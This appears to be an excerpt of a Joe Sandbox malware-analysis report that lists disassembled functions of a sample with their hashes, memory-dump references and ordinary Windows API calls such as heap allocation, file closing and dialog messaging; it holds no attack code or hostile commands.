Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 952650fd5170ad3cdf50d7586339e02bee111cdb895e5999ffb76cfb045f4328
Instruction ID: 409b1094f44203b34d525c2b7d29c02e5bb6bdc264d5dcf2c64f41098a3596f4
Opcode Fuzzy Hash: 952650fd5170ad3cdf50d7586339e02bee111cdb895e5999ffb76cfb045f4328
Instruction Fuzzy Hash: 9F719A71504B449EDF25DB74CC51AEBB7E8EB14342F48496EEDAA47242DA31AA4CCF30

Function 00D5837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D58384

Part of subcall function 00D51380: __EH_prolog.LIBCMT ref: 00D51385
Part of subcall function 00D51380: new.LIBCMT ref: 00D513FE

Part of subcall function 00D519A6: __EH_prolog.LIBCMT ref: 00D519AB

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c46fb5333bd0b32a816ecd43d92038ff6e7d8c67ace9b81560da3f22b42d19bb
Instruction ID: 78efb1ea48e2788df58413c65fad46e778095a3db02bc8439ef2e1e284f0b6bb
Opcode Fuzzy Hash: c46fb5333bd0b32a816ecd43d92038ff6e7d8c67ace9b81560da3f22b42d19bb
Instruction Fuzzy Hash: CD4192718446549AEF20EB60C855BEA73A9EF50301F0440EAED8AA7193DF745ACCEB70

Function 00D51E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D51E05

Part of subcall function 00D53B3D: __EH_prolog.LIBCMT ref: 00D53B42

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6803428c7d62aa3249415c465d4bb5f1aa2bdec4fe440afc880617d7eacbb116
Instruction ID: 7f4cddf904d02d8ff2ff0fb7ae7850a9c98fe1c18662dfd2189d79abafec9826
Opcode Fuzzy Hash: 6803428c7d62aa3249415c465d4bb5f1aa2bdec4fe440afc880617d7eacbb116
Instruction Fuzzy Hash: 58212576904108AFCF25EF99D952AAEBBF6EF58300B14016DEC45A7251CB325A188B70

Function 00D6A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D6A7C8

Part of subcall function 00D51380: __EH_prolog.LIBCMT ref: 00D51385
Part of subcall function 00D51380: new.LIBCMT ref: 00D513FE

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 898c270ab364d8ca7919fe3468e39802ae233efa42db7346aff20e847025d45c
Instruction ID: 83bd6643da9f18ab234f62ad11557b3e37a3156de3bfb31a744738756451bae7
Opcode Fuzzy Hash: 898c270ab364d8ca7919fe3468e39802ae233efa42db7346aff20e847025d45c
Instruction Fuzzy Hash: AA213B75C04249ABCF15DF98C9529EEB7B4EF19300F1004AAE849B7242DB35AE0ADF71

Function 00D592E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D592EB

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6082de1155c5557a75f2bb51b08d6e97e88c983d60b5416c646b351f23be7c72
Instruction ID: 191cb7e7ba22f8a9e630a586f8e4ca541ef2e53a651e07a9da7052a573a47532
Opcode Fuzzy Hash: 6082de1155c5557a75f2bb51b08d6e97e88c983d60b5416c646b351f23be7c72
Instruction Fuzzy Hash: 67118E73E10528DBDF22AEA8CC619EEB736EF48752F044115FC14A7291DA358D1986B0

Function 00D7BB8A Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00D785A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D78FD3,00000001,00000364,?,00D73713,00000050,?,00D90EE8,00000200), ref: 00D785EA

_free.LIBCMT ref: 00D7BBF6

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
Instruction ID: f2cd9e0e44a9bb2a4b5c9b018ed50d4c0e32e6e5e791da755363029f0ca65ca2
Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
Instruction Fuzzy Hash: 4901D6722003096BE3218E699885A5AFBE9EB85370F29451EE59883280FB30A9058774

Function 00D5AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00D5AA9A

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction ID: 8e315b42fe657a7399988affbae872dcac34021a1069c5f1b72e748f21b7e378
Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction Fuzzy Hash: A4F081305007299FDF30DA78C94161677D4EB25322F248B1BEC96C7680E770D888C772

Function 00D785A9 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00D78FD3,00000001,00000364,?,00D73713,00000050,?,00D90EE8,00000200), ref: 00D785EA

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a40070fcfb1ca55fa589e55545e8df9217799af47a8dfed5d22cde76f701c87f
Instruction ID: 626de325a34495acf3071a11d718afa3361407c3b70725e268f57c4e927d1e1f
Opcode Fuzzy Hash: a40070fcfb1ca55fa589e55545e8df9217799af47a8dfed5d22cde76f701c87f
Instruction Fuzzy Hash: 6EF0E9316C0222ABEB215E26DC0DB5B7788DF417A0B18C211AD1CEA180FE20DD016AF4

Function 00D55BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D55BDC

Part of subcall function 00D5B07D: __EH_prolog.LIBCMT ref: 00D5B082

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: ce3edee19d7645e0e420c3b816302d9711f7cf6603766883faa1f25d7a5f407f
Instruction ID: b30a501c59a07fbc8bd6d765ec6aa0d67137f65c8db59dfc438091bd12ec3369
Opcode Fuzzy Hash: ce3edee19d7645e0e420c3b816302d9711f7cf6603766883faa1f25d7a5f407f
Instruction Fuzzy Hash: C7014B34A05684DACB25F7A8C0567DEF7A4DB19701F40459EBC6A53283CBB41B0DC7B2

Function 00D78518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7C13D,00000000,?,00D767E2,?,00000008,?,00D789AD,?,?,?), ref: 00D7854A

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 0725090d9989718a08b0973d574776d171b50cece5ca7b03cc3c76c61e4599c3
Instruction ID: c07524f33ae31fa3d8155f0dc945c2c07d9701807acc52280f9a100c795aab4a
Opcode Fuzzy Hash: 0725090d9989718a08b0973d574776d171b50cece5ca7b03cc3c76c61e4599c3
Instruction Fuzzy Hash: D7E0E5316C02219AEB3126695C0EB5A778DDB417B0F19C310ED5CE2180FF20CC0067F5

Function 00D596D0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00D5968F,?,?,?,?,00D81FA1,000000FF), ref: 00D596EB

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 407e8651e9e97937aafee11de312aedd4e429e891624f391223b9bd7b888f81f
Instruction ID: b68e671e9dc7fd9a72cb600594e7ad9c7d5996c1209860e20ecadd21f2257ad8
Opcode Fuzzy Hash: 407e8651e9e97937aafee11de312aedd4e429e891624f391223b9bd7b888f81f
Instruction Fuzzy Hash: 24F0BE30156B008FDF308A20D568792B7E49B16726F088B1E98EB435A8D770A84D9B20

Function 00D5A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D5A4F5

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: f3c3d852b8f0f0290b978b693cea5242ee01609f789679a667d9cc40840e82ba
Instruction ID: af7fe3b567ea1282b15e41782ed37a54f155c81d7674e93e208287444050e99d
Opcode Fuzzy Hash: f3c3d852b8f0f0290b978b693cea5242ee01609f789679a667d9cc40840e82ba
Instruction Fuzzy Hash: 2FF0B4310087A0AACE221BBC4804BC6BB91AF05332F04CB09FDFD02191C274549D9B33

Function 00D6067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00D606B1

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: fe8d131dc03fe32e43ac9230be3533e2b1d81793325c289a7042b544a3868436
Instruction ID: 1c5a31a3a798e72beb0acc7611c1b369a3be04410b739388151e3eb8e83fde69
Opcode Fuzzy Hash: fe8d131dc03fe32e43ac9230be3533e2b1d81793325c289a7042b544a3868436
Instruction Fuzzy Hash: B0D012256151502BDA2137A4E8067FF1E068FC2711F0D4065B81EA7786CA46488A53B2

Function 00D69D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00D69D81

Part of subcall function 00D69B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D69B30

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: c8154c401193337840b7a9146b4cfcda5b0e2c68cc7a7b3a0f6dd60b3871d7f3
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: B3D0A73021420C7BDF40BA748C22A7AFBADEB10300F004035BC08C6141ED71DE10A675

Function 00D59989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00D59887), ref: 00D59995

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: c41a54f8b18c4ea4fa5ef78ea8fc2c2d9a9001ed02614ac6b5e11640fa855235
Instruction ID: 525d53c48346bce027490e9115ce864467afea9513154db82f57195a0eadf51d
Opcode Fuzzy Hash: c41a54f8b18c4ea4fa5ef78ea8fc2c2d9a9001ed02614ac6b5e11640fa855235
Instruction Fuzzy Hash: E8D01231021240D58F354A344D190DAF751DB83367B3CE6A8DC25C40A1D737C807FD62

Function 00D6D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 00D6D43F

Part of subcall function 00D6AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D6AC85
Part of subcall function 00D6AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D6AC96
Part of subcall function 00D6AC74: IsDialogMessageW.USER32(0001047C,?), ref: 00D6ACAA
Part of subcall function 00D6AC74: TranslateMessage.USER32(?), ref: 00D6ACB8
Part of subcall function 00D6AC74: DispatchMessageW.USER32(?), ref: 00D6ACC2

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: cefe253c76b223f70a98b4c9b5a24cafdc7e585c7e51fd0713a13951c5b7385d
Instruction ID: 65c3cec5eacfbea5a70c259bb11e04c5d1d7c702249d9056c759f88275106c5f
Opcode Fuzzy Hash: cefe253c76b223f70a98b4c9b5a24cafdc7e585c7e51fd0713a13951c5b7385d
Instruction Fuzzy Hash: 07D09E32144300ABDA122B51CE06F1F7AA6EB88B05F004654B744B40B1C6629D20AB36

Function 00D6D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00D6D8A3

Part of subcall function 00D6DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D6DFD6
Part of subcall function 00D6DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D6DFE7

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
